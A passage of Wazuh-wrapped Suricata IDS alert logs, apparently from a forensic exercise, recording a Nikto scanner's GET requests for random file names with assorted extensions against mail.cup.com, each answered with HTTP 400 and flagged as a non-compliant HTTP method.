character","id":"86601","firedtimes":42,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.69143","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.465956+0000\",\"flow_id\":1588798580987989,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47020,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.zip\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.465956+0000","flow_id":"1588798580987989.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47020","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.zip","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.468908+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":43,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.70681","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.468908+0000\",\"flow_id\":1790687813706853,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47022,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.txt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.468908+0000","flow_id":"1790687813706853.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47022","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.txt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.471834+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":44,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.72219","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.471834+0000\",\"flow_id\":1467865186840382,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47024,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.js0x70\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.471834+0000","flow_id":"1467865186840382.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47024","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.js0x70","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.479014+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":45,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.73763","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.479014+0000\",\"flow_id\":1815388170634565,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47026,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bas\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.479014+0000","flow_id":"1815388170634565.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47026","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bas","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.482231+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":46,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.75301","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.482231+0000\",\"flow_id\":2.02973710348082e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47028,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.LCDispatcher\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.482231+0000","flow_id":"2029737103480820.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47028","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.LCDispatcher","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.484832+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":47,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.76861","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.484832+0000\",\"flow_id\":1487763770335653,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47030,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.xml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.484832+0000","flow_id":"1487763770335653.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47030","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.xml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.490695+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":48,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.78399","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.490695+0000\",\"flow_id\":2040551831140588,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47032,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.gz\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.490695+0000","flow_id":"2040551831140588.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47032","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.gz","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.497254+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":49,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.79935","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.497254+0000\",\"flow_id\":119434434482673,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47034,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.xtp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.497254+0000","flow_id":"119434434482673.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47034","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.xtp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.500145+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":50,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.81471","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.500145+0000\",\"flow_id\":833747625352614,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47036,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.iso2022-kr\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.500145+0000","flow_id":"833747625352614.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47036","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.iso2022-kr","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.502204+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":51,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.83021","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.502204+0000\",\"flow_id\":1034666195461575,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47038,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bat\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.502204+0000","flow_id":"1034666195461575.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47038","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bat","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.504875+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":52,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.84559","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.504875+0000\",\"flow_id\":565587047264595,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47040,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.asa\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.504875+0000","flow_id":"565587047264595.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47040","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.asa","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.506877+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":53,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.86095","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.506877+0000\",\"flow_id\":1776793594542443,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47042,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.PRINT\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.506877+0000","flow_id":"1776793594542443.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47042","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.PRINT","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.509502+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":54,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.87637","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.509502+0000\",\"flow_id\":43357678780300,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47044,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.inc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.509502+0000","flow_id":"43357678780300.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47044","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.inc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.511939+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":55,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.89171","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.511939+0000\",\"flow_id\":111342716111856,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47046,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ee\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.511939+0000","flow_id":"111342716111856.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47046","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ee","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.522439+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":56,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.90705","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.522439+0000\",\"flow_id\":22535677342666,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47048,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.gif\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.522439+0000","flow_id":"22535677342666.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47048","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.gif","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.525182+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":57,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.92239","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.525182+0000\",\"flow_id\":1801949218013082,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47050,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.tmp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.525182+0000","flow_id":"1801949218013082.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47050","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP 